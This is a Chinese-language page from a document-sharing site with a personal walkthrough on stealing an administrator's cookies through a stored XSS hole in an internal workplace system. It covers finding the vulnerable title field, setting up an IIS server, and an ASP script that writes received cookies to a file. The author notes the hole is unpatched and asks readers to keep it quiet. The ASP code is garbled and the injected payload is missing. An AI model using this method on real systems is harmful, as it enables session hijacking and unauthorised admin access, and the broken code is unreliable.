云题海 - 专业文章范例文档资料分享平台

当前位置:首页 > 利用xss漏洞获取cookie

利用xss漏洞获取cookie

  • 62 次阅读
  • 3 次下载
  • 2025/7/5 1:02:29

利用xss漏洞获取cookie得到管理员权限

注:不要外部传播,因为这类问题开发一直没改,被发现我会被开除的。

一. 检测xss漏洞

内网,漏洞界面截图:

我在标题和内容里输入了,保存,结果打开有xss的弹出框,经过确定是标题栏存在xss漏洞,而内容栏已经被过滤。

二. 部署偷取cookie

1.安装IIS

我是windows 2003的,插入系统盘,控制面板,添加/删除windows组件,应用程序服务器,IIS在这里,安装好后,建立站点,也就选择主目录,首页等配置,这部分内容网上都有的,大学也学过的。

2.编写偷取cookie的代码 代码如下: <%

msg=Request.ServerVariables(\ testfile=Server.MapPath(\

set fs=server.CreateObject(\ set thisfile=fs.OpenTextFile(testfile,8,True,0) thisfile.Writeline(\ thisfile.close set fs = nothing %>

在iis部署公网能访问的目录下新建个文本,命名为s.asp,把以上代码复制进去。代码我也不是很看到懂。估计就是把返回的内容写在cook.txt这个文件里吧。

3.用我自己的帐号show/12345678登录(昵称是:我的帐号),找到刚才存在xss漏洞的界面,新建,在标题栏里输入:

因为标题字数做了限制100字符,所以我把上面的代码后半部分去除了,修改为:

Copyright © 云题海 All Rights Reserved. 苏ICP备16052595号-3 网站地图 客服QQ:370150219 邮箱:370150219@qq.com